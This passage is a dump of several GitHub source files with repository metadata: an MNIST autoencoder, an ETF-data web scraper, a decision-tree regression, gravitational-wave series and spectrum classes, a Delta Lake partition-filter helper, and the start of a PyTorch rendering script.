validation_size=0, one_hot= False)\r\n\r\nimg = mnist.train.images[20]\r\nplt.imshow(img.reshape((28,28)))\r\n\r\n\r\n# set the input parameter\r\nhidden_units = 64\r\ninput_units = mnist.train.images.shape[1]\r\n\r\n# 由于AutoEncoder是对源输入的复现,因此这里的输出层数据与输入层数据相同\r\ninputs_ = tf.placeholder(tf.float32, (None,input_units), name = 'inputs_')\r\ntargets_ = tf.placeholder(tf.float32, (None,input_units), name = 'targets_')\r\n\r\n# the hidden layer\r\nhidden_ = tf.layers.dense(inputs_, hidden_units, activation=tf.nn.relu)\r\n\r\n# the output layer\r\nlogits_ = tf.layers.dense(hidden_, input_units, activation=None)\r\noutputs_ = tf.sigmoid(logits_, name='outputs_')\r\n\r\n# loss function\r\nloss = tf.nn.sigmoid_cross_entropy_with_logits(labels=targets_,logits= logits_)\r\ncost = tf.reduce_mean(loss)\r\n\r\n# optimization\r\nlearning_rate = 0.01\r\noptimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)\r\n\r\n# start training\r\nsess = tf.Session()\r\nepochs = 20\r\nbatch_size = 128\r\nsess.run(tf.global_variables_initializer())\r\nfor e in range(epochs):\r\n for idx in range(mnist.train.num_examples//batch_size):\r\n batch = mnist.train.next_batch(batch_size)\r\n batch_cost, _ = sess.run([cost, optimizer],\r\n feed_dict={inputs_:batch[0],\r\n targets_:batch[0]})\r\n print(\"Epoch: {}/{}\" . format(e+1,epochs),\r\n \"Training loss: {:.4f}\" .format(batch_cost))\r\n\r\nfig, axes = plt.subplots(nrows=2, ncols=5, sharex=True, sharey=True, figsize=(20,8))\r\ntest_imgs = mnist.test.images[:5]\r\nreconstructed, compressed = sess.run([outputs_, hidden_],\r\n feed_dict={inputs_: test_imgs})\r\n\r\nfor image, row in zip([test_imgs, reconstructed], axes):\r\n for img, ax in zip(image, row):\r\n ax.imshow(img.reshape((28, 28)))\r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\n\r\nfig.tight_layout(pad=0.1)\r\n\r\nfig, axes = plt.subplots(nrows=1, ncols=5, sharex=True, sharey=True, figsize=(20,4))\r\nfor img, ax in zip(compressed, axes):\r\n ax.imshow(img.reshape((8,8)))\r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\nfig.tight_layout(pad=0)","repo_name":"nabil1994/auto_encoder","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73246650931","text":"import copy\nimport re\n\nfrom .base import BaseAPI, HtmlTableParser, strip_html_tags\nfrom .exceptions import DataException, SymbolNotFound\n\n\nclass EtfDb(BaseAPI):\n \"\"\"\n EtfDb.com\n \"\"\"\n\n def get_basic_info(self):\n \"\"\"\n Returns basic info about the given ETF. The info is:\n\n - Issuer\n - Brand\n - Structure\n - Expense Ratio\n - Inception\n - Index Tracked\n - Category\n - Leveraged\n - Asset Class\n - Asset Class Size\n - Region (General)\n - Region (Specific)\n - Description\n - Assets Under Management\n\n :return: ETF basic info as a dict.\n :rtype: dict\n \"\"\"\n\n # Get HTML.\n try:\n html = self._get(\n f\"https://etfdb.com/etf/{self.symbol.upper()}/#etf-ticker-profile\"\n )\n except Exception as e:\n raise SymbolNotFound from e\n\n finds = re.findall(\n r\"class=\\'ticker-assets\\'.*?>(.*?)[^<]*\", html.text, re.DOTALL\n )\n\n # Check if the HTML contains only two occurrences.\n if 0 == len(finds):\n raise SymbolNotFound\n if 2 < len(finds):\n raise DataException(\n \"More that two occurrences found in HTML - don't know what to do now\"\n )\n\n # Process 1st list.\n list_items = re.findall(r\"(.*?)\", finds[0], re.DOTALL)\n list_items = [strip_html_tags(i) for i in list_items]\n data = dict(zip(list_items[::2], list_items[1::2]))\n\n # Process 2nd list.\n list_items = re.findall(r\"(.*?)\", finds[1], re.DOTALL)\n list_items = [strip_html_tags(i) for i in list_items]\n data |= dict(zip(list_items[::2], list_items[1::2]))\n\n for key in copy.deepcopy(data).keys():\n if key not in [\n \"Issuer\",\n \"Brand\",\n \"Structure\",\n \"Expense Ratio\",\n \"Inception\",\n \"Index Tracked\",\n \"Category\",\n \"Leveraged\",\n \"Asset Class\",\n \"Asset Class Size\",\n \"Region (General)\",\n \"Region (Specific)\",\n ]:\n del data[key]\n\n # Fetch description.\n finds = re.findall(\n r\"id='analyst-report'>.*?

(.+?)

\", html.text, re.DOTALL\n )\n\n # Check if the HTML contains only ine occurrences.\n if 0 == len(finds):\n raise SymbolNotFound\n if 1 < len(finds):\n raise DataException(\n \"More that one occurrences found in HTML - don't know what to do now\"\n )\n\n data[\"Description\"] = strip_html_tags(finds[0])\n\n # ASM\n finds = re.findall(\n r\"AUM[^<]+]+>([^<]+)\", html.text, re.DOTALL\n )\n\n # Check if the HTML contains only one occurrences.\n if 0 == len(finds):\n raise SymbolNotFound\n if 1 < len(finds):\n raise DataException(\n \"More that one occurrences found in HTML - don't know what to do now\"\n )\n\n data[\"Assets Under Management\"] = finds[0]\n\n # 52 week hi/low.\n finds = re.findall(\n r\"52 Week Lo[^<]+]+>([^<]+)\", html.text, re.DOTALL\n )\n\n # Check if the HTML contains only one occurrences.\n if 0 == len(finds):\n raise SymbolNotFound\n if 1 < len(finds):\n raise DataException(\n \"More that one occurrences found in HTML - don't know what to do now\"\n )\n\n data[\"Year Low\"] = finds[0]\n\n finds = re.findall(\n r\"52 Week Hi[^<]+]+>([^<]+)\", html.text, re.DOTALL\n )\n\n # Check if the HTML contains only one occurrences.\n if 0 == len(finds):\n raise SymbolNotFound\n if 1 < len(finds):\n raise DataException(\n \"More that one occurrences found in HTML - don't know what to do now\"\n )\n\n data[\"Year High\"] = finds[0]\n\n return data\n\n def get_holdings(self):\n \"\"\"\n Returns ETF holdings (15 at max) list where each item is a list with items:\n\n - symbol\n - stock name\n - percentage\n \"\"\"\n try:\n html = self._get(f\"https://etfdb.com/etf/{self.symbol.upper()}/#holdings\")\n except Exception as e:\n raise SymbolNotFound from e\n\n finds = re.findall(\n r\"]*etf-holdings[^>]*>(.*?)\", html.text, re.DOTALL\n )\n\n if not finds:\n raise DataException(\"No holdings found.\")\n\n finds = re.findall(r\"(.*?)\", finds[0], re.DOTALL)\n rows = []\n\n if finds:\n parser = HtmlTableParser(3)\n parser.feed(finds[0])\n\n rows = parser.get_data()\n\n return rows\n","repo_name":"im-n1/rug","sub_path":"rug/etfdb.py","file_name":"etfdb.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"15459263612","text":"import pandas as pd\r\n\r\n# Read data\r\ndata = pd.read_csv(\"housing_RT.csv\", index_col=0)\r\ndata.iloc[1:5,]\r\n\r\n#Using hold-out to percific data trained\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(data.iloc[:,1:5], data.iloc[:,0],\r\ntest_size = 1/3.0, random_state=100)\r\nX_train[1:5]\r\nX_test[1:5]\r\n\r\n# Building model for training\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nregressor = DecisionTreeRegressor(random_state = 0)\r\nregressor.fit(X_train, y_train)\r\n\r\n# Predict and judge the model\r\ny_pred = regressor.predict(X_test)\r\ny_test[1:5]\r\ny_pred[1:5]\r\n\r\n# Chi so MSE\r\nfrom sklearn.metrics import mean_squared_error\r\nerr = mean_squared_error(y_test, y_pred)\r\nerr\r\n\r\n# Chi so RMSE\r\n","repo_name":"greatMonster11/CT202","sub_path":"Day3-NavieBayes/housing_RT.py","file_name":"housing_RT.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30472484480","text":"\"\"\"\nThis is the module for gravitational wave coherent search.\nWriter: Shallyn(shallyn.liu@foxmail.com)\n\"\"\"\n\nimport numpy as np\nfrom .._core import resample\nfrom scipy.signal import resample as scipy_resample\nfrom scipy.interpolate import interp1d, interp2d\nfrom .._utils import interp2d_complex, LOGGER\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import BoundaryNorm\nfrom matplotlib.ticker import MaxNLocator\nfrom matplotlib import gridspec\n\n\nclass Series(object):\n def __init__(self, value, deltax, info = 'Series'):\n value = np.asarray(value)\n if (len(value.shape) != 1 and value.shape[0] != 1):\n raise Exception(f'Shape error: {value.shape}')\n self._value = value\n self._deltax = deltax\n self._info = info\n \n @property\n def value(self):\n return self._value\n \n @property\n def deltax(self):\n return self._deltax\n\n def __len__(self):\n return len(self._value)\n\n def __abs__(self):\n return abs(self._value)\n\n @property\n def size(self):\n return self._value.size\n \n @property\n def x(self):\n return np.arange(0, self.length, self._deltax)\n\n @property\n def length(self):\n return self._deltax * len(self)\n\n @property\n def real(self):\n return Series(self._value.real, self._deltax, info = f'Re_{self._info}')\n\n @property\n def imag(self):\n return Series(self._value.imag, self._deltax, info = f'Im_{self._info}')\n\n def conjugate(self):\n return Series(self._value.conjugate(), self._deltax, info = f'Conj_{self._info}')\n\n def __str__(self):\n return f'{self._info}: {self._value}'\n \n def __repr__(self):\n return self.__str__()\n \n def __format__(self):\n return self.__str__()\n \n def __iter__(self):\n for x in self._value:\n yield x\n\n def __getitem__(self, key):\n if isinstance(key, np.int):\n return self._value[key]\n return self._getslice(key)\n\n def _getslice(self, index):\n if isinstance(index, slice): \n if index.start is not None and index.start < 0:\n raise ValueError(('Negative start index ({}) is not supported').format(index.start))\n \n if index.step is not None:\n new_deltax = self.deltax * index.step\n else:\n new_deltax = self.deltax\n return Series(self._value[index], deltax = new_deltax)\n if isinstance(index, np.ndarray):\n if len(index) == 1:\n return self._value[index]\n # Check uniform\n grad = np.gradient(index)\n if max(grad) != min(grad):\n raise ValueError(f'Invalid index for Series: {index}')\n step = index[1] - index[0]\n new_deltax = self._deltax * step\n return Series(self._value[index], deltax = new_deltax)\n\n \n def __setitem__(self, key, val):\n self._value[key] = val\n\n def resample(self, new_deltax):\n if new_deltax != self.deltax:\n new = resample(self.value, 1./self.deltax, 1./new_deltax)\n return Series(new, new_deltax, info = self._info)\n else:\n return self\n\n\nclass TimeSeries(Series):\n def __init__(self, value, epoch, fs, info = 'TimeSeries'):\n super(TimeSeries, self).__init__(value, 1./fs, info = info)\n self._epoch = epoch\n \n @property\n def fs(self):\n return int(1./self._deltax)\n \n @property\n def time(self):\n return self._epoch + self.x\n \n @property\n def duration(self):\n return self.length\n \n @property\n def epoch(self):\n return self._epoch\n \n def resample(self, fs_new):\n if fs_new != self.fs:\n new = resample(self.value, self.fs, fs_new)\n return TimeSeries(new, epoch=self.epoch, fs=self.fs, info=self.info)\n else:\n return self\n\n def plot(self, fsave, gps = 0,\n xrange = None, yrange = None,\n xlabel = None, ylabel = None,\n figsize = None, pset = None,\n title = None):\n if figsize is None:\n figsize = (10, 5)\n if pset in (None, 'origin',):\n val = self.value\n if pset in ('abs', 'snr'):\n val = np.abs(self.value)\n if title is None:\n title = self._info\n if xrange is None:\n xrg = None\n else:\n xrg = (xrange[0] - gps, xrange[1] - gps)\n plt.figure(figsize = figsize)\n plt.plot(self.time - gps, val)\n if gps == 0:\n plt.xlabel(f'gps time')\n else:\n if xrg is None:\n gpsini = self.time[0]\n else:\n gpsini = xrg[0] + gps\n plt.xlabel(f'gps time since {gpsini}')\n plt.xlim(xrg)\n plt.ylim(yrange)\n plt.title(title)\n plt.savefig(fsave, dpi = 200)\n plt.close()\n\n \n\nclass MultiSeries(object):\n def __init__(self, array, deltax, y):\n array = np.asarray(array)\n if len(array.shape) == 1:\n if array.shape[0] > 0:\n array = array.reshape(1, array.size)\n self._isempty = False\n else:\n array = np.array([])\n self._isempty = True\n else:\n self._isempty = False\n self._array = array\n if not self._isempty:\n self._deltax = deltax\n if isinstance(y, np.int) or isinstance(y, np.float):\n y = [y]\n y = np.asarray(y)\n if len(y) > 0:\n if (len(y.shape) != 1 and y.shape[0] != 1):\n raise Exception(f'Shape error for y: {y.shape}')\n if y.size != self._array.shape[0]:\n raise Exception(f'Incompatible size for y: {y.size}')\n self._y = y.reshape(y.size)\n else:\n raise Exception(f'Invalid variable: {y}')\n else:\n self._deltax = None\n self._y = None\n \n @property\n def array(self):\n return self._array\n\n @property\n def y(self):\n return self._y\n\n @property\n def deltax(self):\n return self._deltax\n\n @property\n def x(self):\n return np.arange(0, self.length, self._deltax)\n\n def __len__(self):\n return self.shape[1]\n\n @property\n def ysize(self):\n return self.shape[0]\n\n @property\n def length(self):\n return self.xsize * self._deltax\n \n @property\n def height(self):\n return self._y[-1] - self._y[0]\n\n @property\n def xsize(self):\n return self.shape[1]\n\n @property\n def shape(self):\n return self._array.shape\n\n def __iter__(self):\n for i in range(self.ysize):\n yield (self.y[i], Series(self._array[i,:], self.deltax))\n\n def append(self, series, y):\n if not isinstance(series, Series):\n series = Series(series, self.deltax)\n if not self._isempty:\n if len(series) != self.xsize:\n raise Exception(f'Incompatible size: {series.size} != {self.xsize}')\n if series.deltax != self.deltax:\n raise Exception(f'Incompatible deltax: {series.deltax} != {self.deltax}')\n if y > self._y[-1]:\n idx_insert = self.ysize\n self._array = np.insert(self._array, idx_insert, series.value, axis=0)\n self._y = np.insert(self._y, idx_insert, y)\n else:\n idx_insert = np.where(self._y - y >= 0)[0][0]\n if self._y[idx_insert] == y:\n self._array[idx_insert,:] = series.value\n else:\n self._array = np.insert(self._array, idx_insert, series.value, axis=0)\n self._y = np.insert(self._y, idx_insert, y)\n else:\n size = series.size\n self._deltax = series.deltax\n self._array = series.value.reshape(1, size)\n if not isinstance(y, np.int) or not isinstance(y, np.float):\n raise TypeError(f'Invalid type: {type(y)}')\n self._y = np.array([y])\n\n\n\n \nclass TimeFreqSpectrum(MultiSeries):\n def __init__(self, array, epoch, fs, freqs, info = 'TimeFreqSpectrum'):\n super(TimeFreqSpectrum, self).__init__(array, 1./fs, freqs)\n self._info = info\n if not self._isempty:\n if isinstance(epoch, np.int) or isinstance(epoch, np.float):\n epoch = [epoch]\n epoch = np.asarray(epoch)\n if len(epoch) == 1:\n self._epoch = np.ones(self.ysize) * epoch[0]\n elif len(epoch) == self.ysize:\n self._epoch = epoch\n else:\n raise Exception(f'Incompatible shape for epoch: {epoch.shape}')\n else:\n epoch = None\n @property\n def epoch(self):\n return self._epoch\n\n @property\n def trange(self):\n epoch_min = min(self.epoch)\n epoch_max = max(self.epoch)\n return epoch_max, epoch_min + self.length\n\n @property\n def times(self):\n return np.arange(self.trange[0], self.trange[1], self._deltax)\n \n @property\n def fs(self):\n return 1./self.deltax\n \n @property\n def frequencies(self):\n return self.y\n\n def __iter__(self):\n for i in range(self.ysize):\n yield (self.frequencies[i], TimeSeries(self._array[i,:], self.epoch[i], self.fs, info = self._info))\n \n def append(self, timeseries, freq, epoch = None, fs = None):\n if not isinstance(timeseries, TimeSeries) and epoch is None:\n raise TypeError(f'Invalid type: {timeseries}')\n elif epoch is not None and isinstance(timeseries, np.ndarray):\n value = timeseries\n if fs is None:\n deltax = self.deltax\n else:\n deltax = 1./fs\n size = value.size\n else:\n value = timeseries.value\n epoch = timeseries.epoch\n deltax = timeseries.deltax\n size = timeseries.size\n \n\n if not self._isempty:\n if size != self.xsize:\n raise Exception(f'Incompatible size: {timeseries.size} != {self.xsize}')\n if deltax != self.deltax:\n raise Exception(f'Incompatible deltax: {timeseries.deltax} != {self.deltax}')\n if freq > self._y[-1]:\n idx_insert = self.ysize\n self._array = np.insert(self._array, idx_insert, value, axis=0)\n self._epoch = np.insert(self._epoch, idx_insert, epoch)\n self._y = np.insert(self._y, idx_insert, freq)\n else:\n idx_insert = np.where(self._y - freq >= 0)[0][0]\n if self._y[idx_insert] == freq:\n self._array[idx_insert, :] = value\n self._epoch[idx_insert] = epoch\n else:\n self._array = np.insert(self._array, idx_insert, value, axis=0)\n self._epoch = np.insert(self._epoch, idx_insert, epoch)\n self._y = np.insert(self._y, idx_insert, freq)\n else:\n self._array = value.reshape(1, size)\n self._epoch = np.array([epoch])\n self._y = np.array([freq])\n self._deltax = deltax\n self._isempty = False\n\n def interpolate(self, t_interp):\n ret = np.zeros([self.ysize, len(t_interp)], self._array.dtype)\n for i, epoch in enumerate(self.epoch):\n ret[i,:] = np.interp(t_interp, self.x + epoch, self._array[i,:])\n return ret\n\n def get_finterp(self, pset = None):\n xp = self.times\n yp = self.frequencies\n zp = self.interpolate(xp)\n if pset in ('abs',):\n zp = np.abs(zp)\n if zp.dtype == complex:\n return interp2d_complex(xp, yp, zp)\n else:\n return interp2d(xp, yp, zp)\n\n def plot_spectrum(self, times, freqs,\n fsave,\n figsize = None, \n cmaptype = 'jet', pcolorbins = 100,\n xlabel = None, ylabel = None,\n xlim = None, ylim = None,\n yticks = None,\n title = None):\n # plot setting\n if figsize is None:\n figsize = (12, 7)\n cmap = plt.get_cmap(cmaptype)\n if ylim is None:\n ylim = [self.frequencies[0], self.frequencies[-1]]\n if yticks is None:\n yticksval = np.logspace(np.log10(ylim[0]), np.log10(ylim[1]), 5)\n yticks = (yticksval, ['%.1f'%_freq for _freq in yticksval])\n if title is None:\n title = self._info\n\n x = times\n y = freqs\n z = self.get_finterp(pset = 'abs')(x,y)\n if xlabel is None:\n idx_tpeak_0, idx_fpeak_0 = get_2D_argpeak(z)\n tpeak = '%.2f'%x[idx_tpeak_0]\n fpeak = '%.1f'%y[idx_fpeak_0]\n snrpeak = '%.3f'%z[idx_fpeak_0, idx_tpeak_0]\n xlabel = f'loudest snr = {snrpeak}, at geocent gps = {tpeak}, f = {fpeak}'\n\n levels = MaxNLocator(nbins=pcolorbins).tick_values(z.min(), z.max())\n norm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)\n\n fig = plt.figure(figsize = figsize)\n ax = fig.add_subplot(111)\n im = ax.pcolormesh(x, y, z, cmap = cmap, norm = norm)\n fig.colorbar(im, ax=ax)\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.ylim(ylim)\n plt.xlim(xlim)\n plt.yscale('log')\n if isinstance(yticks, tuple):\n plt.yticks(*yticks)\n plt.savefig(fsave ,dpi = 200)\n plt.close()\n\n def plot_spectrum_with_track(self,\n tmpl, gps_trigger, fsave,\n figsize = None, \n cmaptype = 'jet', pcolorbins = 100,\n xlabel = None, ylabel = None,\n yticks = None,\n title = None):\n # Track\n track_x, track_y = tmpl.get_track(gps_trigger,0)\n ntrack = len(track_x)\n if ntrack > 1e4:\n fs_plot = int(self.fs * (1e4 / ntrack))\n track_x = resample(track_x, tmpl.fs, fs_plot)\n track_y = resample(track_y, tmpl.fs, fs_plot)\n ntrack = len(track_x)\n else:\n fs_plot = self.fs\n # plot setting\n if figsize is None:\n figsize = (12, 7)\n cmap = plt.get_cmap(cmaptype)\n ylim = (self.frequencies[0], self.frequencies[-1])\n xlim = (max(track_x[0] - 0.5, self.trange[0]), min(track_x[-1] + 0.5, self.trange[1]))\n if yticks is None:\n yticksval = np.logspace(np.log10(ylim[0]), np.log10(ylim[1]), 5)\n yticks = (yticksval, ['%.1f'%_freq for _freq in yticksval])\n \n if title is None:\n title = self._info\n\n x = np.arange(xlim[0], xlim[1], 1./fs_plot)\n y = np.logspace(np.log10(ylim[0]), np.log10(ylim[1]), 500)\n func = self.get_finterp(pset = 'abs')\n z = func(x,y)\n\n if xlabel is None:\n idx_tpeak_0, idx_fpeak_0 = get_2D_argpeak(z)\n tpeak = '%.2f'%x[idx_tpeak_0]\n fpeak = '%.1f'%y[idx_fpeak_0]\n snrpeak = '%.3f'%z[idx_fpeak_0, idx_tpeak_0]\n xlabel = f'loudest snr = {snrpeak}, at geocent gps = {tpeak}, f = {fpeak}'\n\n levels = MaxNLocator(nbins=pcolorbins).tick_values(z.min(), z.max())\n norm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)\n\n fig = plt.figure(figsize = figsize)\n plt.title(title)\n ax1 = fig.add_subplot(111)\n im = ax1.pcolormesh(x, y, z, cmap = cmap, norm = norm)\n fig.colorbar(im, ax=ax1)\n plt.plot(track_x, track_y, '-', color='#ba7b00', zorder=3, lw=1.5)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.ylim(ylim)\n plt.xlim(xlim)\n plt.yscale('log')\n if isinstance(yticks, tuple):\n plt.yticks(*yticks)\n # Plot track evolution\n plt.savefig(fsave ,dpi = 200)\n plt.close()\n\n def calc_trace_val(self, track_x, track_y, max_search = 5):\n ret = []\n freqs = []\n for i,freq in enumerate(self.frequencies):\n if freq < track_y[0] or freq > track_y[-1]:\n continue\n gps = track_x[get_idx(track_y, freq)]\n times = self.epoch[i] + self.x\n idxes = np.where( np.abs(times - gps) < max_search/freq )[0]\n ret.append(np.max(self._array[i, idxes]))\n freqs.append(freq)\n return np.asarray(ret), np.asarray(freqs)\n\n\n def calc_trace(self, tmpl, gps_trigger,\n back_collect_num = 250, thresh = 0.9, wide = 1):\n track_x, track_y = tmpl.track\n SNR_median = np.median(self._array)\n tlim_start, tlim_end = self.trange\n # Get gps trigger index\n idx_gps_trigger = int( (gps_trigger - self.epoch[-1]) * self.fs )\n idx_gps_wide = int( wide * self.fs )\n idx_gps_start = int( (self.epoch[-1] - self.epoch[0]) * self.fs )\n # Get track\n re_track_x, re_track_y = track_wrapper(track_x, track_y, gps_trigger, tlim_start, tlim_end)\n trigger_traceSNR, freqs = self.calc_trace_val(re_track_x, re_track_y)\n trigger_traceSNR_int = np.sum(trigger_traceSNR) / len(trigger_traceSNR)\n # Set threshold\n thresh = trigger_traceSNR_int * thresh\n background = []\n count = 0\n snrs = self._array[:,idx_gps_start:(idx_gps_trigger - idx_gps_wide)]\n indexes = np.where(snrs > thresh)[1]\n if len(indexes) < back_collect_num:\n while(1):\n thresh = thresh * 0.95\n indexes = np.where(snrs > thresh)[1]\n if len(indexes) >= back_collect_num:\n break\n elif len(indexes) > 100*back_collect_num:\n while(1):\n thresh = thresh * 1.05\n indexes = np.where(snrs > thresh)[1]\n if len(indexes) <= 100*back_collect_num:\n break\n\n idx_recent = -100\n for idx in indexes:\n if idx - idx_recent < 50:\n idx_recent = idx\n continue\n idx_recent = idx\n this_gps = self.epoch[-1] + self.x[idx]\n re_track_x, re_track_y = track_wrapper(track_x, track_y, this_gps, tlim_start, tlim_end)\n if re_track_x is None:\n continue\n back_trackSNR = self.calc_trace_val(re_track_x, re_track_y)[0]\n background.append(back_trackSNR)\n count += 1\n if count > back_collect_num:\n return trigger_traceSNR, freqs, background\n return trigger_traceSNR, freqs, background\n\n def calc_background_track(self, tmpl, back_collect_num = 250, wide = 1):\n # Get track\n track_x, track_y = tmpl.track\n SNR_median = np.median(self._array)\n SNR_max = np.max(self._array)\n tlim_start, tlim_end = self.trange\n # Set threshold\n thresh = (SNR_max + SNR_median) / 2\n background = []\n count = 0\n # Get gps trigger index\n idx_gps_end = len(self.epoch) - int( wide * self.fs )\n idx_gps_start = int( (self.epoch[-1] - self.epoch[0]) * self.fs )\n snrs = self._array[:,idx_gps_start:idx_gps_end]\n indexes = np.where(snrs > thresh)[1]\n if len(indexes) < back_collect_num:\n while(1):\n thresh = thresh * 0.95\n indexes = np.where(snrs > thresh)[1]\n if len(indexes) >= back_collect_num:\n break\n elif len(indexes) > 100*back_collect_num:\n while(1):\n thresh = thresh * 1.05\n indexes = np.where(snrs > thresh)[1]\n if len(indexes) <= 100*back_collect_num:\n break\n\n idx_recent = -100\n for idx in indexes:\n if idx - idx_recent < 50:\n idx_recent = idx\n continue\n idx_recent = idx\n this_gps = self.epoch[-1] + self.x[idx]\n re_track_x, re_track_y = track_wrapper(track_x, track_y, this_gps, tlim_start, tlim_end)\n if re_track_x is None:\n continue\n back_trackSNR = self.calc_trace_val(re_track_x, re_track_y)[0]\n background.append(np.average(back_trackSNR))\n count += 1\n if count > back_collect_num:\n return background\n return background\n\n\n\ndef track_wrapper(track_x, track_y, gps, limit_start, limit_end):\n track_x = track_x + gps\n ini = track_x[0]\n end = track_x[-1]\n deltax = track_x[1] - ini\n if ini > limit_end or end < limit_start:\n return None, None\n if ini < limit_start:\n idx_start = int((limit_start - ini) / deltax) + 1\n else:\n idx_start = 0\n \n if end > limit_end:\n idx_end = int( (limit_end - ini) / deltax ) - 1\n else:\n idx_end = len(track_x)\n return track_x[idx_start:idx_end], track_y[idx_start:idx_end]\n\ndef calc_track_integration(func, track_x, track_y):\n ntrack = len(track_x)\n idx_trace = np.arange(ntrack)\n trace = func(track_x, track_y)[idx_trace, idx_trace]\n return trace\n\ndef get_idx(arr, val):\n delta = np.abs(arr - val)\n return np.argmin(delta)\n\ndef get_2D_argpeak(matrix):\n arg = np.where(matrix == np.max(matrix))\n return arg[1][0], arg[0][0]\n\n","repo_name":"Shallyn/pygwcoh","sub_path":"_datatypes/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":21618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32177304265","text":"from __future__ import annotations\n\nfrom typing import cast\n\nfrom .types import Filter, Filters\n\n\ndef get_partition_filters(\n partition_columns: list[str], filters: Filters\n) -> list[list[Filter]] | None:\n \"\"\"Retrieve only filters on partition columns. If there are any row filters in the outer\n list (the OR list), return None, because we have to search through all partitions to apply\n row filters\n\n Parameters\n ----------\n partition_columns : List[str]\n List of partitioned columns\n\n filters : List[Tuple[str, str, Any]] | List[List[Tuple[str, str, Any]]]\n List of filters. Examples:\n 1) (x == a) and (y == 3):\n [(\"x\", \"==\", \"a\"), (\"y\", \"==\", 3)]\n 2) (x == a) or (y == 3)\n [[(\"x\", \"==\", \"a\")], [(\"y\", \"==\", 3)]]\n\n Returns\n -------\n List[List[Tuple[str, str, Any]]] | None\n List of partition filters, None if we can't apply a filter on partitions because\n row filters are present\n \"\"\"\n if filters is None or len(filters) == 0:\n return None\n\n if isinstance(filters[0][0], str):\n filters = cast(list[list[Filter]], [filters])\n\n allowed_ops = {\n \"=\": \"=\",\n \"==\": \"=\",\n \"!=\": \"!=\",\n \"!==\": \"!=\",\n \"in\": \"in\",\n \"not in\": \"not in\",\n \">\": \">\",\n \"<\": \"<\",\n \">=\": \">=\",\n \"<=\": \"<=\",\n }\n\n expressions = []\n for disjunction in filters:\n inner_expressions = []\n for col, op, val in disjunction:\n if col in partition_columns:\n normalized_op = allowed_ops[op]\n inner_expressions.append((col, normalized_op, val))\n if inner_expressions:\n expressions.append(inner_expressions)\n else:\n return None\n\n return expressions if expressions else None\n","repo_name":"dask-contrib/dask-deltatable","sub_path":"dask_deltatable/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"21"} +{"seq_id":"20901800825","text":"import torch\nimport torch.optim\nimport torch.nn as nn\nimport torch.autograd as autograd\nfrom torch.autograd import Variable\nimport render_pytorch\nimport image\nimport camera\nimport material\nimport light\nimport shape\nimport numpy as np\nimport math\nimport random\nimport load_obj\n\ndef safe_asin(x):\n \"\"\"\n return pi/2 if x == 1, otherwise return asin(x)\n \"\"\"\n safe_x = torch.where(x < 1, x, torch.zeros_like(x))\n return torch.where(x < 1, torch.asin(safe_x), (math.pi/2) * torch.ones_like(x))\n\ndef length(x):\n return torch.sqrt(torch.sum(x * x, 1))\n\ndef compute_vertex_normal(vertices, indices):\n # Nelson Max, \"Weights for Computing Vertex Normals from Facet Vectors\", 1999\n normals = torch.zeros_like(vertices)\n v = [vertices[indices[:, 0]],\n vertices[indices[:, 1]],\n vertices[indices[:, 2]]]\n for i in range(3):\n v0 = v[i]\n v1 = v[(i + 1) % 3]\n v2 = v[(i + 2) % 3]\n e1 = v1 - v0\n e2 = v2 - v0\n e1_len = length(e1)\n e2_len = length(e2)\n side_a = e1 / e1_len.view([-1, 1])\n side_b = e2 / e2_len.view([-1, 1])\n if i == 0:\n n = torch.cross(side_a, side_b)\n n = n / length(n).view([-1, 1])\n angle = torch.where(torch.sum(side_a * side_b, 1) < 0, \n math.pi - 2.0 * safe_asin(0.5 * length(side_a + side_b)),\n 2.0 * safe_asin(0.5 * length(side_b - side_a)))\n sin_angle = torch.sin(angle)\n \n normals[indices[:, i]] += n * (sin_angle / (e1_len * e2_len)).view([-1, 1])\n\n normals = normals / length(normals).view([-1, 1])\n return normals\n\nresolution = [256, 256]\ncam = camera.Camera(position = np.array([0, 3, -6], dtype=np.float32),\n look_at = np.array([0, 0, 0], dtype=np.float32),\n up = np.array([0, 1, 0], dtype=np.float32),\n cam_to_world = None,\n fov = 45.0,\n clip_near = 0.01,\n clip_far = 10000.0,\n resolution = resolution)\nmat_grey=material.Material(diffuse_reflectance=torch.from_numpy(np.array([0.5,0.5,0.5],dtype=np.float32)))\nmat_black=material.Material(diffuse_reflectance=torch.from_numpy(np.array([0.0,0.0,0.0],dtype=np.float32)))\nmaterials=[mat_grey,mat_black]\n# plane_vertices, plane_indices=generate_plane([32, 32])\n# shape_plane=shape.Shape(plane_vertices,plane_indices,None,None,0)\nindices, vertices, uvs, normals = load_obj.load_obj('results/heightfield_gan/model.obj')\nindices = Variable(torch.from_numpy(indices.astype(np.int64)))\nvertices = Variable(torch.from_numpy(vertices))\nnormals = compute_vertex_normal(vertices, indices)\nshape_plane=shape.Shape(vertices,indices,None,normals,0)\nlight_vertices=Variable(torch.from_numpy(\\\n np.array([[-0.1,50,-0.1],[-0.1,50,0.1],[0.1,50,-0.1],[0.1,50,0.1]],dtype=np.float32)))\nlight_indices=torch.from_numpy(\\\n 